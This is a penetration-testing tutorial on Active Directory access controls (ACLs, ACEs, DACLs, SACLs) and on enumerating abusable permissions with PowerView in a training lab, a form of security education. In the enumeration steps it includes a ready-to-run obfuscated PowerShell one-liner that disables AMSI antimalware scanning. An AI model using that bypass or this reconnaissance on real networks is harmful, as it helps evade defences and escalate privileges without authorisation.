Enumerating Access Controls in Active Directory
Understanding Active Directory Controls — ACLs, ACEs, DACLs, and SACLs
Photo by Jonathon Young on Unsplash
Access Controls are a set of permissions given to an object. In an active directory environment, an object is an entity that represents an available resource within the organization’s network, such as domain controllers, users, groups, computers, shares, etc. There are 12 types of AD objects:
- User object
- Contact object
- Printer object
- Computer object
- Shared folder
- Group
- Organizational Unit
- Domain
- Domain controller
- Site objects
- Bulletin
- Foreign security principals
Generally, maintaining Active Directory permissions is complicated and hard to manage, especially in complex environments with multiple domains and forests. Weak permissions are one of the go-to vectors for privilege escalation during an internal security assessment. That’s because their enumeration process doesn’t require special domain level privileges, and they can be done on the user level.
Today’s post discusses the active directory access controls, their structure, and how to enumerate them in a post-exploitation scenario using the PowerView script. The demonstration steps will be on the Pentester Academy Active Directory Lab by Nikhil Mittal associated with the CRTP course.
$_Access_Control_Overview
The Access Control model is designed to check requests from users, services, or processes to access an available object. The requests get granted or rejected depending on the requested object’s permissions.
The ACL checking process involves 2 steps when evaluating a request:
- Access token consists of the requester’s identity and privileges.
- Object’s Security Descriptors are the permissions list, known as DACL and SACL. The DACL validates the requester Access Token against the object’s permissions list to decide to grant or reject that request, and the SACL logs the successes or failures of these requests.
📍 DACL is Discretionary Access Control List and SACL is System Access List.
Figure 1 — shows the DACL list of Domain Admins group in an Active Directory
To better understand the model, let’s take an example of a user in the Sales department who wants access to a financial share called Budgeting 2022. The user would initiate a request to the Budgeting 2022 object presenting their Access Token that shows their identity and privileges, i.e., John from the Sales Department.
Then, the targeted object — Budgeting 2020 validates the user access token against the object list of permissions (DACL). If the list allows the sales department members to access the Budgeting 2022 object, the user will grant the access, and if not, the request would get rejected, and in both cases, the granting or rejecting of the request would be logged by the SACL.
◼ ️DACL Structure
The access control list consists of multiple individual permissions known as ACEs — Access Control Entries. Each entry has a permission type (allow or deny), a principal account (who is this permission for — user, group, computer), what objects the principal account can access, and the access rights [read, write, Full Control]. Access Control Entries (ACE) in a DACL list — Active Directory Enumeration
Figure 2 — shows the Access Control Entries (ACE) in a DACL list
$_Enumeration_Steps
The first step is to download the PowerView script and import it with the Import-Module cmdlet.
Import-Module .\powerview.ps1
Figure 3 — Import PowerView Script
If the AMSI (Antimalware Scan Interface) blocks the script, you can bypass it by running the below PowerShell command.
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ([TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(("{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
📌 Check this GitHub Gist for other PowerShell bypasses — reigningshells/powershell-bypasses.ps1
◼Get ACLs of Users and Groups Objects
To enumerate an objects’ access control permissions, run the Get-ObjectAcl cmdlet and pass it an object name (a user, group, or computer). The command would return a list of access entries related to the requested object. The GUID resolver parameter gets the group ID of the requested object.
If the object name is different than the SAM account name, use the SAMAccountName property with the object name.
Get-ObjectAcl Object-Name –ResolveGUIDs
Get-ObjectAcl -SAMAccountName Object-Name –ResolveGUIDs
Figure 4 — ACEs of the object Student223
Figure 5 — shows the ACEs properties of the student 223 object
As we see in the above screenshots, the command returns all the access control entries(ACEs) of the requested object “student223”.
There are 4 interesting properties to check in the results:
- ObjectDN (Object Distinguished Name) is the object name — Student223
- IdentityReference is who has access to the object. As seen above, the built-in administrators’ group has access to the Student223 object.
- ActiveDirectoryRights are the types of permissions given to the object. In our example, the built-in administrators’ group has WriteDacl and WriteOwner on the student223 object.
- AccessControlType is an Allow access.
The WriteOwner permission indicates the object’s ownership which means that the built-in administrators have full control on the Student223 object. The WriteDACl is right to modify the objects DACL’s list.
There are other interesting permissions to look for when enumerating Active Directory rights like in the below list:
Figure 6- shows Interesting Active Directory Rights — iRed Team list
To filter through a specific type of permission, use the equal (-eq) operator and pass it the permission type such as “GenericAll.”
Get-ObjectAcl student223 |{$_.ActiveDirectoryRights -eq "GenericAll"}
Figure 7 — shows all ACEs with GenericAll permissions
Figure 8 — shows the groups who have the GenericAll (full control) permissions on the Student223 object
◼️Get ACLs Associated with Specific Prefix
Run the Get-ObjectACL command with the ADSPrefix parameter to search for specific controls using common names [CN], organizational units[OU], or domain controllers [DC]. In the example below, I searched for the access entries associated with the student machines Organizational Unit.
Get-ObjectAcl -ADSprefix 'OU=Studentmachines' - Verbose
Figure 9 — shows access entries associated with the student machines Organizational Unit
##◼️ Get ACLs Associated with Specific LDAP path With PowerView, we can search for access entries of an object using its LDAP path. Run the Get-ObjectAcl cmdlet with the ADSpath parameter.
Get-ObjectAcl -ADSpath “LDAP:// ” -ResolveGUIDs -verbose
Figure 10 — shows the permissions of the Student230 object using its LDAP path
📍 You can get the AdPaths of objects by running these commands:
Get-Netcomputers -FullData | select cn, adspath
Get-NetGroups -FullData | select cn, adspath
◼️ Get ACLS with Invoke Scanner
PowerView has a scanner module that scans the domain for all interesting abusable permissions, i.e., write, modify or genericall, etc.
To run the scanner, use Invoke-ACLScanner.
Invoke-ACLScanner -ResolveGUIDs
As seen in the below screenshot, the scanner found multiple access control entries with GenericAll rights. An example is the RDPUsers group with GenericAll rights on the Control127User object.
Figure 11 — shows the results of the Invoke-ACLScanner
◼️ Get ACLs Associated with UNC path
We can search for access controls of network shares like SYSVOL share for enumerating group policy objects and scripts using its UNC path.
To do so, run the Get-Path cmdlet with the Path parameter.
Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"
Figure 12 — shows get ACLs Associated with UNC path
That’s all for today; we learned about Active Directory access controls and how to enumerate them to collect valuable information to leverage for the privilege escalate phase.
Thanks a lot for reading !!
🔔 All of the used commands are found at R3d-Buck3T — ( Active Directory — Access Control List (ACL) Enumeration)
🌐$_Refereces
(Attacking and Defending Active Directory Lab)[pentesteracademy.com]
Active Directory (Attack & Defense ) Figure 5 — shows the ACEs properties of the student 223 object